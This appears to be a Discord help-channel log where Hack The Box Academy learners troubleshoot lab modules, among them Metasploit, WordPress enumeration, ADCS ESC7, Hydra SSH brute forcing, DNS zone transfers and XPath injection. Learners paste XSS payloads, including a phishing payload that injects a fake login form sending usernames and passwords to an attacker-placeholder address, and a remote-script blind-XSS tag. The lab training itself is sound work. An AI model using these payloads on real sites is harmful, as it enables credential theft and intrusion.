what does ||[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp|| mean?

nothing

i see

can you tell us the exact error 😂

Holaa soy nueva en el servidor!!

it gets removed

english only, read #welcome and #rules

is the “no module named sysinfo”?

[*] target - Target OS: Windows Server 2016 Standard 14393
[-] target - Timeout::Error
[-] target - execution expired
[-] target - /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/timeout-0.4.1/lib/timeout.rb:43:in `rescue in handle_timeout'
/us

there is alot more text after

is your target even alive? ping it

had to redact the target ip

yes it pings

I have a question regarding the module:

• Getting Started : Public Exploits

In this module you need to exploit a vulnerable plugin, namely:

• Simple Backup Plugin 2.7.10 for WordPress

The only reason I was able to exploit it, is because the webpage basically tells you in plain-text about it in the form of a blog post. However I don't feel this reflects a real-world webapp, they don't announce their plugins and versions. I can't figure out a command that lets me find this plugin on the webpage.

I've just reset the target webapp here:
94.237.62.195:47057

What tool/command finds the actual plugin without just reading the title of the banner?

i dont know if this has to do with using wsl + kex as opposed to a traditional vm

i can pop a kali vm onto kvm/qemu

it happens more often than you think

i completed the module with debian wsl + exegol

another L for wsl :) config/routing issues

potentially firewall stuff

might be right

just disabled the firewall

sadly same issue

also i recommend trying the other eternal romance which is just RCE

and change the COMMAND option to whoami /priv

I'm willing to accept that sometimes websites may do that. But there must be a way to find the plugin without relying on a user error like that right?

there's some modules that go over enum tools

there's a hacking wordpress module : but for the purposes of demonstration that's why it was so simple

they wanted the focus to be putting you in the mindset

=\

seems i will get the same error no matter the exploit used

and you changed RHOST yeah?

to the new IP you spawned

yeah, i use setg instead of set before

i don't mess with WSL just because I like having an easily configurable virtual environment ¯_(ツ)_/¯

also copy/paste go brr :D

true

im installing windows 10 on my desktop rn

??

not a fan of dragonised garuda

wdym installing win10?

are you using a vm in a vm type deal or somethin?

saw you mention kvm/qemu

yeah, i was going to use kvm/qemu and passthrough a gpu to use windows in vm and linux as host

so you were using wsl; in a vm?

trying to make this make sense

no, using wsl on my laptop

ah ok

had me concerned you were doin some real dumb shit rn

imagine windows10 vm using wsl

😵

that's why i was confused for a sec

it virtualizes the virtual

btw: there is a vbox version for linux

¯_(ツ)_/¯

what is the best distro for pentesting?

im just getting into this

there is no "best distro"

i've heard its just packages

most will either use Kali or Parrot

(some will use BlackArch/Arch)

i was using garuda blackarch

but for the most part if you're using a debian based distro it's all the same

but for htb using kali wsl

personal preference mostly ¯_(ツ)_/¯

i was trying to find a distro that looks like windows 7

there's not really a distro that looks like win7

you can customize using a KDE

and google different KDEs to find one that might be similar

im pretty new to the linux side of things

is that like installing a gui?

basically

I went through the various enum tools discussed prior to the module to see if any of them would show the Wordpress plugin.
Namely, cURL, whatweb, and nmap. None of them were able to enumerate the plugin that the "Simple Backup Plugin 2.7.10".
What tool would you have used? Or should I have downloaded a wordpress enumeration script for nmap?

there's a wordpress enum tool

but it's not referred to

poor dude who's wall of text keeps getting yeeted

the script for nmap?

no

it's an actual tool

wpscan

mm okay. so for certain services you need a specialized tool to see the associated plugins. There isn't really a catch-all?

you can fuzz for plugins under the wp-plugins directory

^

with ffuf for example

but again this is getting-started module

so you're not expected to really know all about these tools

yes just continue 😂

and i'm guessing for the sake of not mindflooding new users: they kept it basic

I see, thank you.

tbh @unique finch if all else fails: just use the in-browser pwnbox if you can

it works perfectly fine from there

yeah

something about having your own pwnbox though

yep

it seems like you have a grasp what to do: just the tool on your end being st00pid

i dont even want a career in cyber sec, just want to learn more about exploits. more specifically windows kernel exploits

good for gamehacks

eh there's really not many that focus on kernel exploits

idk about the game hacking modules

more so into reversing and intercepting packets

there are many kernel escalation pocs on github

RIP dude shorten your message at this point since it keeps getting yeeted

LMAO

idk if there's many kernel exploit related modules

it will delete it if you use ip adrr

i need help in SMB module : Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer. i have used rpcclient but either i cant see the answer if its in front of me or im issuing the wrong commands ive used the commands in the module

the only barely mention of it is in the windows privesc module

hint Samba

Hi all,

don't think my earlier post made it through, not sure why it's not appearing in the thread.

But basically looking to see if anyone was able to provide a nudge/hint for the final question of the ADCS skills assessment.

Tried ESC8/11 to Dev and remote to DC - No good
Tried ESC7 as per the play in the lesson - No luck
Tried enrolling a cert with X (that he has permissions for) and approving with Y (given the group he is part of) - No luck

I feel that ESC7 is the path the assessment wants to go down, but i think im missing a vital step to get me over the line.

because 1) your main account isn't linked
2) your message was so long automod basically treated it as spam

#welcome <- instructions and stuff here

ah, it's prob #2 - went into a bit of detail about what i attempted to help detail what ive tried.

it's both

it's not a or b

it's a AND b

understood. thank you.

also as a note

please refrain from using usernames and such in your requests for assistance

there are lots of pocs that are handy to use, im trying to learn the networking side of things such as packet sniffing ect. kernel esc is a fun topic if you are interested you can look into efi_driver_access on github by TheCruZ

you can shortand users as t* or to* if two users share the same first initial

but this delves into convo away from academy modules ;)

@languid pulsar whomst the fuck are you? i didn't give permission to dm :)

it's esc7, enumerate which type of esc7 to use

true, are there no modules for packet interception?

i think there's a wireshark module

¯_(ツ)_/¯

you know the academy has a search feature right?

i should probably stop using this chat as a gen chat then haha

just passing the time while i get my own pwnbox up and running i guess

there is a gen chat if you follow #welcome instructions 😉

sounds good

hopefully i can get through these modules on vmware with kali

should be able to

¯_(ツ)_/¯

I know guys this maybe not the place to ask but

I wanna ask are the pro labs been updated like the scenarios of approaching flags, methods, etc? Because I did rasta labs and dante a while ago and I'm going for Zephyr and if I get stuck maybe try either lab again so just wanna know before I buy the subscription

read #welcome for instructions on linking your account to access the prolabs related channels

Thank you

I've used certipy to identify the vuls, which shows the group that J* is part of (s***t), but also saw that that group doesn't have MA permissions. Is it a case of me working out a way to get that permission assigned to J's account?

you can use another permission for esc7

can see both E* and M--s permissions. Though I've tried to issue a cert from a template that T* could enrol in (didn't see any template that J* could).

check what group J* is in

k thanks. I'll check again now.

this is such the worst website

what a shame; then why are you here

because i clicked next for everything in the tutorial make it easier

anyways i am leaving now

k bye

https://tenor.com/view/easy-button-that-was-easy-red-button-press-the-button-gif-17005111

why doesn't it connect?

you don't need sudo for ssh

Vpn connected?

but also ^

Sure

"Sure" isn't a yes/no answer

Yes

can you ping the IP

can you nmap it

em am i doing something wrong ? currently I'm doing the module: Password Attack/Password Mutation, i downloaded the file there is 3 files i mutate the password.list using the custom.rule given in the downloaded files. than i use hydra to tried and get the password for the user "sam" ? seem like its going to take 64hr? is there something wrong ? any help will be greatly appreciated

don't attack ssh

the username isn't supplied correctly here, there's no need to sudo ssh

username is supplied properly

the prompt for kali was because they used sudo

yeah that's what I meant

Wrong ip

Yes

from the quick screenshot

you are using wrong IP

xD

Sneak peek screenshot

i get it. Sorry ; )

let me try smth else see will it work. thx for the hint! really thought i was going to have to w8 64hr ...

also -t 48

ping that ip

ah

unstable connection

Already

Ok

Is it my problem ? )

change vpn regions and download a new vpn (close and delete the old one)

also use the tcp

Ok

Thank you, it works

your ping should now also be stable

is there any way tp change the background color of htb academy/

not unless you use a browser plugin

i think there's one that some people use called lightreader

thx!

got it? :D

(note ssh is super slow, you should almost never brute force it unless you have to, and even then don't and just cry)

there's a tool that's been mentioned for bruteforcing ssh - called ssb

haven't tried it

i will give it a try. initially i set -t 4 on ssh take 64hr now i set -t 48 and take like 3hr 🙂 haha but seem like attacking ssh just take too long

just try a different protocol

use nmap to find open ports

ty! completely forgotten nmap exist

lol that's what my first hint was pushing towards: don't brute ssh

after using XSS strike to find a payload like '><dEtAiLs%0aontoGGle+=+[8].find(confirm)%0dx//

where do i inject the payload?

if there's somewhere to input text maybe

yea its in the url

but where do i put my payload?

do i put it at the end of that?

'><dEtAiLs%0aontoGGle+=+[8].find(confirm)%0dx//<script>alert(document.cookie)</script>

try using dev tools to just paste it in, or do it how the section described

usually xss is done via a form on the page, but it can be done in url

i am but if i want to put my own script

to do something where do i put it

along with the payload?

¯_(ツ)_/¯

does the section give more details?

no not really

then figure it out i guess?

idk if that will be interpreted by a browser url

'><a/+/oNMoUsEOVEr+=+(prompt)``><!--document.write('--!><h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove(); anyone kno why that dont remove the id urlform

¯_(ツ)_/¯

it helps to give context on what module and section you're working on

xss phising

html comments dont affect the actual javascript too right only what it displays on web/

is that the one where the question has you upload something to send?

or why does making html comment not affect the code? yes login form

but isn't there a /send or whatever

he comments out a piece of the code on the website using a html comment but it doesnt affect the thing why?

no

likely it wasn't an important peace of code, like a header or something

¯_(ツ)_/¯

as suggested by the module to understand it better: try viewing page source to see what it's doing

i c but also some of my payload shows up as text how do I remove it if I html comment it out it wont work anymore..

well when you view-source it's gonna show that it injects it in-front of the html code

on a normal view it's not gonna show much

wdym

also

there is a /phishing/send.php

ik i did it im just trying to make it look nice

document.write('<h3> this bit shows up in white text but how do i remove it

¯_(ツ)_/¯

you should at least first test it

if you test it as shown: do you get login info

yea i got the flag it all works

but i just wanna make the text hidden

don't worry about it

kk

btw your copy paste shows `` instead of doublequotes here

or singlequotes whatever you're trying to do

thats the way it formatted

just put it into a codeblock

i didn't change anything

wdym

just made it easier to parse the different things for myself

oh i c

using ```html at the top and then closing with ``` underneath it puts it into codeblock

oh i c ok danke

also your URL payload doesn't include the html comment out at the end of the payload? unless that wasn't copy/pasted on here

btw i'd suggest deleting the code block since that's technically how to get the answer

😉

ll

finally solve it ty!

DNS Module : What is the FQDN of the host where the last octet ends with "x.x.x.203"? 1st thing i did is run ||dig axfr inlanefreight.htb @10.129.181.78|| and got ||app.inlanefreight.htb. 604800 IN A 10.129.18.15
dev.inlanefreight.htb. 604800 IN A 10.12.0.1
internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
ns.inlanefreight.htb. 604800 IN A 127.0.0.1|| then i ran against each subdomain the 2 commands ||dig axfr app.inlanefreight.htb @10.129.32.216|| and ||dnsenum --dnsserver 10.129.32.216 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --threads 90 app.inlanefreight.htb|| but i cannot get the answer. plz help me

"Dns module" pretty sure that's not the name of it

But you should be fierce with your wordlists

Module btw is Footprinting

can someone help[ me with xss the blind xss

i cant <script src="http://ip/script.js">
i post in both inputs but no work at all

I got a question I am very new to hack the box. Should I do hack the box on kali linux (vm) or should I do it on my mac?

Hi can anyone please help me with Injection attacks module - skill assessment? I got to|| xml exfiltration || now I'm stuck.

If you've gotten till there then you're on the right path. From there, it's a matter of adjusting your payload to get just what you want. Check the XPath sections to get more idea.

I think I can get the whole ||xml file|| but I do not see the flag there

Hello everyone, could you give me a little help here? Im having this issue with xfreerdp since yesterday

I cant make progress in CDSA modules

If it takes more than an hour, then you are doing something wrong

You can't actually see the whole ||xml content from the iframe|| if your payload is just blasting the whole thing. The amount of ||entries in the XML base is huge or should I say the id you need is phenomenal 😶 ||

Well, again you are doing something wrong, none of the exercises takes significant amount of time

If it takes, then change the approach or vector

So, you know the usual flag format for HTB. ||Think how you can have your payload to just search for that format and get just that entry|| @sonic arch

The XPath sections will give you the thing you need for your payload or even some googling will do.

¯_(ツ)_/¯

Thank you

Also, have you tried getting the source code for the internal application? That should give you a better idea but again, the whole thing logic behind the query isn't complicated and can be done with assumptions of how the query code would look like.

I need help in the module YARA & Sigma for SOC Analysts and other modules that need to use xfreerdp, Its isnt working as it should be, not connecting and having errors

I get this errors everytime I go for RDP